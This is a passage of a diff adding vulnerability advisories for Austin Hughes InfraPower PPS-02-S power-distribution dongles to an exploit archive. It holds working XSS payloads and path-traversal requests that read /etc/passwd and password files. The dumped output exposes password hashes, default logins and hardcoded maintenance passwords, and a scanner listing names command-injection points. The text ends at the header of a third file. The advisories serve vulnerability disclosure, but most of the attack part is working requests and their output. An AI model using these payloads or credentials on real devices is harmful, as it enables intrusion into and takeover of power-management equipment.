Date: Fri, 17 Jan 2003 16:58:52 GMT
|
||||||
|
Server: lighttpd/1.4.30-devel-1321
|
||||||
|
Content-Length: 751
|
||||||
|
|
||||||
|
verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
|
||||||
|
bin:x:1:1:bin:/bin:/bin/sh
|
||||||
|
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
|
||||||
|
adm:x:3:4:adm:/adm:/bin/sh
|
||||||
|
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
|
||||||
|
sync:x:5:0:sync:/bin:/bin/sync
|
||||||
|
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
|
||||||
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
||||||
|
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
|
||||||
|
operator:x:11:0:Operator:/var:/bin/sh
|
||||||
|
nobody:x:99:99:nobody:/home:/bin/sh
|
||||||
|
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
|
||||||
|
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
|
||||||
|
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
|
||||||
|
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
|
||||||
|
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
|
235
platforms/php/webapps/40641.txt
Executable file
235
platforms/php/webapps/40641.txt
Executable file
|
@ -0,0 +1,235 @@
|
||||||
|
InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Austin Hughes Electronics Ltd.
|
||||||
|
Product web page: http://www.austin-hughes.com
|
||||||
|
Affected version: Q213V1 (Firmware: V2395S)
|
||||||
|
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
|
||||||
|
|
||||||
|
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
|
||||||
|
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
|
||||||
|
Patented IP Dongle provides IP remote access to the PDUs by a true
|
||||||
|
network IP address chain. Only 1xIP dongle allows access to max. 16
|
||||||
|
PDUs in daisy chain - which is a highly efficient cient application
|
||||||
|
for saving not only the IP remote accessories cost, but also the true
|
||||||
|
IP addresses required on the PDU management.
|
||||||
|
|
||||||
|
Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
|
||||||
|
when input passed via several parameters to several scripts is not properly
|
||||||
|
sanitized before being returned to the user. This can be exploited to execute
|
||||||
|
arbitrary HTML and script code in a user's browser session in context of an affected
|
||||||
|
site.
|
||||||
|
|
||||||
|
Tested on: Linux 2.6.28 (armv5tel)
|
||||||
|
lighttpd/1.4.30-devel-1321
|
||||||
|
PHP/5.3.9
|
||||||
|
SQLite/3.7.10
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2016-5369
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
|
||||||
|
|
||||||
|
|
||||||
|
27.09.2016
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
#################################################################################
|
||||||
|
|
||||||
|
GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1
|
||||||
|
|
||||||
|
#################################################################################
|
||||||
|
|
||||||
|
POST /FWUpgrade.php HTTP/1.1
|
||||||
|
Host: 192.168.0.17
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
------WebKitFormBoundary207OhXVwesC60pdh
|
||||||
|
Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"
|
||||||
|
Content-Type: text/php
|
||||||
|
|
||||||
|
t00t
|
||||||
|
------WebKitFormBoundary207OhXVwesC60pdh
|
||||||
|
Content-Disposition: form-data; name="upfile"
|
||||||
|
|
||||||
|
somefile.php
|
||||||
|
------WebKitFormBoundary207OhXVwesC60pdh
|
||||||
|
Content-Disposition: form-data; name="ID_Page"
|
||||||
|
|
||||||
|
Firmware.php?Menu=FRM
|
||||||
|
------WebKitFormBoundary207OhXVwesC60pdh--
|
||||||
|
|
||||||
|
|
||||||
|
#################################################################################
|
||||||
|
|
||||||
|
POST /SNMP.php?Menu=SMP HTTP/1.1
|
||||||
|
Host: 192.168.0.17
|
||||||
|
|
||||||
|
SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
|
||||||
|
|
||||||
|
#################################################################################
|
||||||
|
|
||||||
|
|
||||||
|
lqwrm@zslab:~#
|
||||||
|
lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
|
||||||
|
-------------------------------------------------
|
||||||
|
PHP Source Code Security Scanner v0.2
|
||||||
|
(c) Zero Science Lab - http://www.zeroscience.mk
|
||||||
|
Tue Sep 27 10:35:52 CEST 2016
|
||||||
|
-------------------------------------------------
|
||||||
|
|
||||||
|
Scanning recursively...Done.
|
||||||
|
|
||||||
|
dball.php:
|
||||||
|
|
||||||
|
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
||||||
|
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
||||||
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
||||||
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
||||||
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
||||||
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
||||||
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
||||||
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
||||||
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
||||||
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
||||||
|
|
||||||
|
|
||||||
|
doupgrate.php:
|
||||||
|
|
||||||
|
Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
|
||||||
|
Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
|
||||||
|
Line 15: Command Injection in 'system' via '$_POST'
|
||||||
|
Line 16: Command Injection in 'system' via '$_POST'
|
||||||
|
Line 19: Command Injection in 'system' via '$_POST'
|
||||||
|
|
||||||
|
|
||||||
|
Firmware.php:
|
||||||
|
|
||||||
|
Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
|
||||||
|
|
||||||
|
|
||||||
|
Function.php:
|
||||||
|
|
||||||
|
Line 257: Header Injection in 'header' via '$_SERVER'
|
||||||
|
Line 267: Header Injection in 'header' via '$_SERVER'
|
||||||
|
|
||||||
|
|
||||||
|
FWUpgrade.php:
|
||||||
|
|
||||||
|
Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
||||||
|
Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
||||||
|
Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
||||||
|
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
||||||
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
||||||
|
|
||||||
|
|
||||||
|
index.php:
|
||||||
|
|
||||||
|
Line 2: Header Injection in 'header' via '$_SERVER'
|
||||||
|
|
||||||
|
|
||||||
|
IPSettings.php:
|
||||||
|
|
||||||
|
Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
|
||||||
|
Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
|
||||||
|
Line 117: Command Injection in 'exec' via '$IP_setting'
|
||||||
|
Line 117: Command Injection in 'exec' via '$Netmask_setting'
|
||||||
|
Line 123: Command Injection in 'exec' via '$Gateway_setting'
|
||||||
|
|
||||||
|
|
||||||
|
ListFile.php:
|
||||||
|
|
||||||
|
Line 12: PHP File Inclusion in 'fgets' via '$fp'
|
||||||
|
|
||||||
|
|
||||||
|
Login.php:
|
||||||
|
|
||||||
|
Line 151: Command Injection in 'shell_exec' via '$_POST'
|
||||||
|
|
||||||
|
|
||||||
|
Ntp.php:
|
||||||
|
|
||||||
|
Line 46: Command Injection in 'exec' via '$idx'
|
||||||
|
|
||||||
|
|
||||||
|
OutletDetails.php:
|
||||||
|
|
||||||
|
Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
||||||
|
Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
||||||
|
Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
||||||
|
Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
||||||
|
Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
|
||||||
|
Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
|
||||||
|
Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
||||||
|
|
||||||
|
|
||||||
|
PDUStatus.php:
|
||||||
|
|
||||||
|
Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
|
||||||
|
|
||||||
|
|
||||||
|
production_test1.php:
|
||||||
|
|
||||||
|
Line 6: Command Injection in 'shell_exec' via '$_POST'
|
||||||
|
Line 45: Command Injection in 'proc_open' via '$_ENV'
|
||||||
|
|
||||||
|
|
||||||
|
SensorDetails.php:
|
||||||
|
|
||||||
|
Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
||||||
|
Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
||||||
|
Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
||||||
|
|
||||||
|
|
||||||
|
SensorStatus.php:
|
||||||
|
|
||||||
|
Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
|
||||||
|
|
||||||
|
|
||||||
|
SNMP.php:
|
||||||
|
|
||||||
|
Line 41: Command Injection in 'exec' via '$_POST'
|
||||||
|
|
||||||
|
|
||||||
|
System.php:
|
||||||
|
|
||||||
|
Line 54: Header Injection in 'header' via '$_SERVER'
|
||||||
|
Line 64: Header Injection in 'header' via '$_SERVER'
|
||||||
|
Line 99: Command Injection in 'exec' via '$datetime'
|
||||||
|
Line 99: Command Injection in 'exec' via '$datetime'
|
||||||
|
Line 99: Command Injection in 'exec' via '$datetime'
|
||||||
|
Line 99: Command Injection in 'exec' via '$datetime'
|
||||||
|
Line 99: Command Injection in 'exec' via '$datetime'
|
||||||
|
Line 99: Command Injection in 'exec' via '$datetime'
|
||||||
|
Line 185: Command Injection in 'exec' via '$TimeServer'
|
||||||
|
Line 286: Command Injection in 'exec' via '$IP_setting'
|
||||||
|
Line 286: Command Injection in 'exec' via '$Netmask_setting'
|
||||||
|
Line 292: Command Injection in 'exec' via '$Gateway_setting'
|
||||||
|
|
||||||
|
|
||||||
|
UploadEXE.php:
|
||||||
|
|
||||||
|
Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
||||||
|
Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
||||||
|
Line 82: Command Injection in 'popen' via '$_FILES'
|
||||||
|
Line 96: PHP File Inclusion in 'fgets' via '$fp'
|
||||||
|
Line 96: PHP File Inclusion in 'fgets' via '$buffer'
|
||||||
|
|
||||||
|
|
||||||
|
WriteRequest.php:
|
||||||
|
|
||||||
|
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
|
||||||
|
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
|
||||||
|
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------
|
||||||
|
Scan finished. Check results in scan_output.txt file.
|
||||||
|
|
||||||
|
lqwrm@zslab:~#
|
389
platforms/php/webapps/40642.txt
Executable file
389
platforms/php/webapps/40642.txt
Executable file
|
@ -0,0 +1,389 @@
|
||||||
|
InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Austin Hughes Electronics Ltd.
|
||||||
|
Product web page: http://www.austin-hughes.com
|
||||||
|
Affected version: Q213V1 (Firmware: V2395S)
|
||||||
|
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
|
||||||
|
|
||||||
|
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
|
||||||
|
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
|
||||||
|
Patented IP Dongle provides IP remote access to the PDUs by a true
|
||||||
|
network IP address chain. Only 1xIP dongle allows access to max. 16
|
||||||
|
PDUs in daisy chain - which is a highly efficient cient application
|
||||||
|
for saving not only the IP remote accessories cost, but also the true
|
||||||
|
IP addresses required on the PDU management.
|
||||||
|
|
||||||
|
Desc: InfraPower suffers from a file disclosure vulnerability when
|
||||||
|
input passed thru the 'file' parameter to 'ListFile.php' script is
|
||||||
|
not properly verified before being used to read files. This can
|
||||||
|
be exploited to disclose contents of files from local resources.
|
||||||
|
|
||||||
|
-------------------------------------------------------------------
|
||||||
|
ListFile.php:
|
||||||
|
-------------
|
||||||
|
|
||||||
|
8: if(isset($_GET['file'])){
|
||||||
|
9: $handle = $_GET['file'];
|
||||||
|
10: $fp = fopen('/ramdisk/'.$handle, 'r');
|
||||||
|
11: while(!feof($fp)){
|
||||||
|
12: $tmp=fgets($fp,2000);
|
||||||
|
13: $tmp = str_replace("\n","<br />",$tmp);
|
||||||
|
14: echo $tmp;
|
||||||
|
15: }
|
||||||
|
16: fclose($fp);
|
||||||
|
17: }
|
||||||
|
|
||||||
|
-------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
Tested on: Linux 2.6.28 (armv5tel)
|
||||||
|
lighttpd/1.4.30-devel-1321
|
||||||
|
PHP/5.3.9
|
||||||
|
SQLite/3.7.10
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2016-5370
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php
|
||||||
|
|
||||||
|
|
||||||
|
27.09.2016
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd
|
||||||
|
|
||||||
|
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
|
||||||
|
bin:x:1:1:bin:/bin:/bin/sh
|
||||||
|
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
|
||||||
|
adm:x:3:4:adm:/adm:/bin/sh
|
||||||
|
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
|
||||||
|
sync:x:5:0:sync:/bin:/bin/sync
|
||||||
|
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
|
||||||
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
||||||
|
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
|
||||||
|
operator:x:11:0:Operator:/var:/bin/sh
|
||||||
|
nobody:x:99:99:nobody:/home:/bin/sh
|
||||||
|
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
|
||||||
|
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
|
||||||
|
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
|
||||||
|
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
|
||||||
|
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
|
||||||
|
|
||||||
|
|
||||||
|
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf
|
||||||
|
|
||||||
|
LoginAuth 1
|
||||||
|
UserName 00000000
|
||||||
|
Password 00000000
|
||||||
|
|
||||||
|
|
||||||
|
http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
|
||||||
|
|
||||||
|
dmin 999999
|
||||||
|
manager 666666
|
||||||
|
user 111111
|
||||||
|
|
||||||
|
|
||||||
|
http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
|
||||||
|
|
||||||
|
#!/bin/sh
|
||||||
|
echo -n "Please enter maintenance password:"
|
||||||
|
read -s pass
|
||||||
|
InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
|
||||||
|
if [ "$InfraType" == "1" ]; then
|
||||||
|
if [ "$pass" != "InfraSolution" ]; then
|
||||||
|
echo "Invalid maintenance password!"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
if [ "$InfraType" == "2" ]; then
|
||||||
|
if [ "$pass" != "InfraGuard" ]; then
|
||||||
|
echo "Invalid maintenance password!"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
if [ "$InfraType" == "3" ]; then
|
||||||
|
if [ "$pass" != "InfraPower" ]; then
|
||||||
|
echo "Invalid maintenance password!"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
if [ "$InfraType" == "4" ]; then
|
||||||
|
if [ "$pass" != "InfraCool" ]; then
|
||||||
|
echo "Invalid maintenance password!"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
#---emergency recovery mode
|
||||||
|
echo "DEBUG su mode started!"
|
||||||
|
su
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
# create menu
|
||||||
|
echo ""
|
||||||
|
echo "***********************************************"
|
||||||
|
echo "* Maintenance Menu *"
|
||||||
|
echo "***********************************************"
|
||||||
|
echo "(1) View(vi) /mnt/mtd/main_conf "
|
||||||
|
echo "(2) View /mnt/mtd/snmp_conf "
|
||||||
|
echo "(3) View /mnt/mtd/net_conf "
|
||||||
|
echo "(4) View /mnt/mtd/web_conf "
|
||||||
|
echo "(5) Enable auto patching(boot.sh) on bootup "
|
||||||
|
echo "(6) Disable auto patching(boot.sh) on bootup "
|
||||||
|
echo "(7) Clear all patching (/mnt/mtd/patch/) "
|
||||||
|
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
|
||||||
|
echo "(9) Process Monitoring "
|
||||||
|
echo "(A) Patch SNMP "
|
||||||
|
echo "(B) Restore Configuration "
|
||||||
|
echo "(P) Restore INI, POL profiles "
|
||||||
|
echo "(E) Execute command line "
|
||||||
|
echo "(M) View meminfo "
|
||||||
|
echo "(X) Terminal console mode "
|
||||||
|
echo "(R) Reboot "
|
||||||
|
echo "(?) This menu "
|
||||||
|
echo "(Q) Exit "
|
||||||
|
echo "***********************************************"
|
||||||
|
while true; do
|
||||||
|
echo -n "Input Maintenance menu item number(? for help):"
|
||||||
|
read y
|
||||||
|
case $y in
|
||||||
|
"?")
|
||||||
|
echo ""
|
||||||
|
echo "***********************************************"
|
||||||
|
echo "* Maintenance Menu *"
|
||||||
|
echo "***********************************************"
|
||||||
|
echo "(1) View(vi) /mnt/mtd/main_conf "
|
||||||
|
echo "(2) View /mnt/mtd/snmp_conf "
|
||||||
|
echo "(3) View /mnt/mtd/net_conf "
|
||||||
|
echo "(4) View /mnt/mtd/web_conf "
|
||||||
|
echo "(5) Enable auto patching(boot.sh) on bootup "
|
||||||
|
echo "(6) Disable auto patching(boot.sh) on bootup "
|
||||||
|
echo "(7) Clear all patching (/mnt/mtd/patch/) "
|
||||||
|
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
|
||||||
|
echo "(9) Process Monitoring "
|
||||||
|
echo "(A) Patch SNMP "
|
||||||
|
echo "(B) Restore Configuration "
|
||||||
|
echo "(P) Restore INI, POL profiles "
|
||||||
|
echo "(E) Execute command line "
|
||||||
|
echo "(M) View meminfo "
|
||||||
|
echo "(X) Terminal console mode "
|
||||||
|
echo "(R) Reboot "
|
||||||
|
echo "(?) This menu "
|
||||||
|
echo "(Q) Exit "
|
||||||
|
echo "***********************************************"
|
||||||
|
;;
|
||||||
|
"1")
|
||||||
|
echo "****/mnt/mtd/main_conf******************************"
|
||||||
|
vi /mnt/mtd/main_conf
|
||||||
|
echo "****************************************************"
|
||||||
|
;;
|
||||||
|
"2")
|
||||||
|
echo "****/mnt/mtd/snmp_conf******************************"
|
||||||
|
cat /mnt/mtd/snmp_conf
|
||||||
|
echo "****************************************************"
|
||||||
|
;;
|
||||||
|
"3")
|
||||||
|
echo "****/mnt/mtd/net_conf*******************************"
|
||||||
|
cat /mnt/mtd/net_conf
|
||||||
|
echo "****************************************************"
|
||||||
|
;;
|
||||||
|
"4")
|
||||||
|
echo "****/mnt/mtd/web_conf*******************************"
|
||||||
|
cat /mnt/mtd/web_conf
|
||||||
|
echo "****************************************************"
|
||||||
|
;;
|
||||||
|
"5")
|
||||||
|
echo "(5) Enable auto patching(boot.sh) on bootup "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans5
|
||||||
|
if [ "$ans5" == "y" ]; then
|
||||||
|
if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
|
||||||
|
echo -n "Patching boot.sh ..."
|
||||||
|
cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
|
||||||
|
chmod 777 /mnt/mtd/boot.sh
|
||||||
|
if [ -f "/mnt/mtd/boot.sh" ]; then
|
||||||
|
echo "...done"
|
||||||
|
else
|
||||||
|
echo "...fail"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo "file not exist: /mnt/mtd/patch/boot.sh"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"6")
|
||||||
|
echo "(6) Disable auto patching(boot.sh) on bootup "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans6
|
||||||
|
if [ "$ans6" == "y" ]; then
|
||||||
|
if [ -f "/mnt/mtd/boot.sh" ]; then
|
||||||
|
echo -n "Disabling boot.sh pacthing..."
|
||||||
|
rm /mnt/mtd/boot.sh
|
||||||
|
echo "...done"
|
||||||
|
else
|
||||||
|
echo "File not exist: /mnt/mtd/boot.sh"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"7")
|
||||||
|
echo "(7) Clear /mnt/mtd/patch/ "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans7
|
||||||
|
if [ "$ans7" == "y" ]; then
|
||||||
|
echo -n " Removing patch files (/mnt/mtd/patch/*)..."
|
||||||
|
rm -r /mnt/mtd/patch/*
|
||||||
|
if [ ! -f "/mnt/mtd/patch/" ]; then
|
||||||
|
echo "...done"
|
||||||
|
echo -n "Reboot to apply changes? [y/n]:"
|
||||||
|
read ans7r
|
||||||
|
if [ "$ans7r" == "y" ]; then
|
||||||
|
echo "Rebooting..."
|
||||||
|
reboot
|
||||||
|
fi
|
||||||
|
|
||||||
|
else
|
||||||
|
echo "...fail"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"8")
|
||||||
|
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans8
|
||||||
|
if [ "$ans8" == "y" ]; then
|
||||||
|
if [ -f "/www/patch/patch_now.sh" ]; then
|
||||||
|
chmod 777 /www/patch/patch_now.sh
|
||||||
|
sh /www/patch/patch_now.sh
|
||||||
|
else
|
||||||
|
echo "file not exist: /www/patch/patch_now.sh"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"9")
|
||||||
|
echo "****Process List*******************************"
|
||||||
|
ps
|
||||||
|
echo "***********************************************"
|
||||||
|
;;
|
||||||
|
"A")
|
||||||
|
echo "(A) Patch SNMP "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans8
|
||||||
|
if [ "$ans8" == "y" ]; then
|
||||||
|
if [ -f "/www/patch/snmplink.sh" ]; then
|
||||||
|
sh /www/patch/snmplink.sh
|
||||||
|
if [ -f "/www/snmplink.log" ]; then
|
||||||
|
cat /www/snmplink.log
|
||||||
|
fi
|
||||||
|
echo "Patching SNMP and its modules...done"
|
||||||
|
else
|
||||||
|
echo "file not exist: /www/patch/snmplink.sh"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"B")
|
||||||
|
echo "(B) Restore Box Configuration(box_conf) "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans8
|
||||||
|
if [ "$ans8" == "y" ]; then
|
||||||
|
if [ -f "/etc/box_conf" ]; then
|
||||||
|
echo "Patching /mnt/mtd/box_conf..."
|
||||||
|
cp /etc/box_conf /mnt/mtd/box_conf
|
||||||
|
if [ -f "/mnt/mtd/box_conf" ]; then
|
||||||
|
echo "Patching /mnt/mtd/box_conf...done"
|
||||||
|
else
|
||||||
|
echo "Patching /mnt/mtd/box_conf...failed"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo "file not exist: /etc/box_conf"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"P")
|
||||||
|
INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
|
||||||
|
echo "(P) Restore INI, POL profiles for $INFRA_VER "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ansP
|
||||||
|
if [ "$ansP" == "y" ]; then
|
||||||
|
if [ "$InfraType" == "1" ]; then
|
||||||
|
echo "Restoring INI, POL profiles for $INFRA_VER..."
|
||||||
|
if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"E")
|
||||||
|
echo -n "Input command line:"
|
||||||
|
read cmd_line
|
||||||
|
$cmd_line
|
||||||
|
;;
|
||||||
|
"M")
|
||||||
|
if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
|
||||||
|
cat /mnt/mtd/log_memCheck.txt
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"R")
|
||||||
|
echo "(R) Reboot "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ansR
|
||||||
|
if [ "$ansR" == "y" ]; then
|
||||||
|
echo "Rebooting..."
|
||||||
|
reboot
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"X")
|
||||||
|
echo "su mode started!"
|
||||||
|
su
|
||||||
|
;;
|
||||||
|
"Q")
|
||||||
|
echo "Leaving maintenance mode........OK"
|
||||||
|
exit 0
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
done
|
54
platforms/php/webapps/40644.txt
Executable file
54
